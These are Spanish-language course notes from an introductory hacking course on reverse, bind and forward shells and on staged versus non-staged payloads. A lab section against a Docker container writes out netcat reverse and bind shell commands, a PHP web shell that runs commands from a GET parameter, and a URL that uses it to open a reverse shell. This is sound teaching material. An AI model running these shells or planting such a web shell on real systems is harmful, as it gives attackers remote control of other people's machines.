infosec/Introduccion-hacking-hack4u/tema_5_conceptos/README.md

TEMA 5 - Conceptos básicos de enumeración y explotación

• TEMA 5 - Conceptos básicos de enumeración y explotación
  • 5.1 Reverse Shells, Bind Shells y Forward Shells
    • Práctica con el contenedor Docker de ubuntu_apache.
  • 5.2 Tipos de payloads (Staged y Non-Staged)
  • 5.3 Tipos de explotación (Manuales y Automatizadas)
  • 5.4 Enumeración del sistema
  • 5.5 Introducción a BurpSuite

5.1 Reverse Shells, Bind Shells y Forward Shells

Diferencias entre Reverse Shell, Bind Shell y Forward Shell:

• Reverse Shell: Es una técnica que permite a un atacante conectarse a una máquina remota desde una máquina de su propiedad. Es decir, se establece una conexión desde la máquina comprometida hacia la máquina del atacante. Esto se logra ejecutando un programa malicioso o una instrucción específica en la máquina remota que establece la conexión de vuelta hacia la máquina del atacante, permitiéndole tomar el control de la máquina remota.
• Bind Shell: Esta técnica es el opuesto de la Reverse Shell, ya que en lugar de que la máquina comprometida se conecte a la máquina del atacante, es el atacante quien se conecta a la máquina comprometida. El atacante escucha en un puerto determinado y la máquina comprometida acepta la conexión entrante en ese puerto. El atacante luego tiene acceso por consola a la máquina comprometida, lo que le permite tomar el control de la misma.
• Forward Shell: Esta técnica se utiliza cuando no se pueden establecer conexiones Reverse o Bind debido a reglas de Firewall implementadas en la red. Se logra mediante el uso de mkfifo, que crea un archivo FIFO (named pipe), que se utiliza como una especie de “consola simulada” interactiva a través de la cual el atacante puede operar en la máquina remota. En lugar de establecer una conexión directa, el atacante redirige el tráfico a través del archivo FIFO, lo que permite la comunicación bidireccional con la máquina remota.

Es importante entender las diferencias entre estas técnicas para poder determinar cuál es la mejor opción en función del escenario de ataque y las limitaciones de la red.

Práctica con el contenedor Docker de ubuntu_apache.

• Primer supuesto (Reverse Shell):
  • En escucha desde anfitrión: nc -nlvp 443
  • Conexión desde el contenedor: ncat -e /bin/bash ip_anfitrión 443
• Segundo supuesto (Bind Shell):
  • Se envía desde el contenedor una shell: nc -nlvp 443 -e /bin/bash
  • Se conecta desde el anfitrión: nc ip_contenedor 443
• Tercer supuesto (Forward Shell):
  • Añadirmos iptables:
    • apt install -y iptables
    • iptables --flush
    • iptables -A INPUT -p tcp --dport 80 -j ACCEPT
    • iptables -A INPUT -p tcp --dport 0:65535 -m conntrack --ctstate NEW -j DROP
  • Borramos el index.html y creamos el fichero cmd.php en /var/www/html:

    <?php
    if (isset($_GET['cmd'])) {
        $command = $_GET['cmd'];
        $output = shell_exec($command);
    
        if ($output === null) {
            echo "Error al ejecutar el comando.";
        } else {
            echo "<pre>" . $output . "</pre>";
        }
    } else {
        echo "Por favor, proporciona un comando a ejecutar.";
    }
    ?>
    

  • Ya podremos enviar comandos por get: http://localhost/cmd.php?cmd=whoami http://localhost/cmd.php?cmd=ps%20-faux
  • Si ponemos en escucha al anfitrión: nc -nlvp 443 podremos conectarnos desde la url: http://localhost/cmd.php?cmd=nc%20ip_anfitrión%20443%20-e%20/bin/bash
  • En el caso que tuviese unas iptables que no permitieran la conexión se puede utilizar este script Python:
    • https://github.com/s4vitar/ttyoverhttp
  • Se puede entablar una Reverse Shell de muchas maneras:
    • https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

5.2 Tipos de payloads (Staged y Non-Staged)

• Payload Staged: Es un tipo de payload que se divide en dos o más etapas. La primera etapa es una pequeña parte del código que se envía al objetivo, cuyo propósito es establecer una conexión segura entre el atacante y la máquina objetivo. Una vez que se establece la conexión, el atacante envía la segunda etapa del payload, que es la carga útil real del ataque. Este enfoque permite a los atacantes sortear medidas de seguridad adicionales, ya que la carga útil real no se envía hasta que se establece una conexión segura.
• Payload Non-Staged: Es un tipo de payload que se envía como una sola entidad y no se divide en múltiples etapas. La carga útil completa se envía al objetivo en un solo paquete y se ejecuta inmediatamente después de ser recibida. Este enfoque es más simple que el Payload Staged, pero también es más fácil de detectar por los sistemas de seguridad, ya que se envía todo el código malicioso de una sola vez.

Es importante tener en cuenta que el tipo de payload utilizado en un ataque dependerá del objetivo y de las medidas de seguridad implementadas. En general, los payloads Staged son más difíciles de detectar y son preferidos por los atacantes, mientras que los payloads Non-Staged son más fáciles de implementar pero también son más fáciles de detectar.

5.3 Tipos de explotación (Manuales y Automatizadas)

5.4 Enumeración del sistema

5.5 Introducción a BurpSuite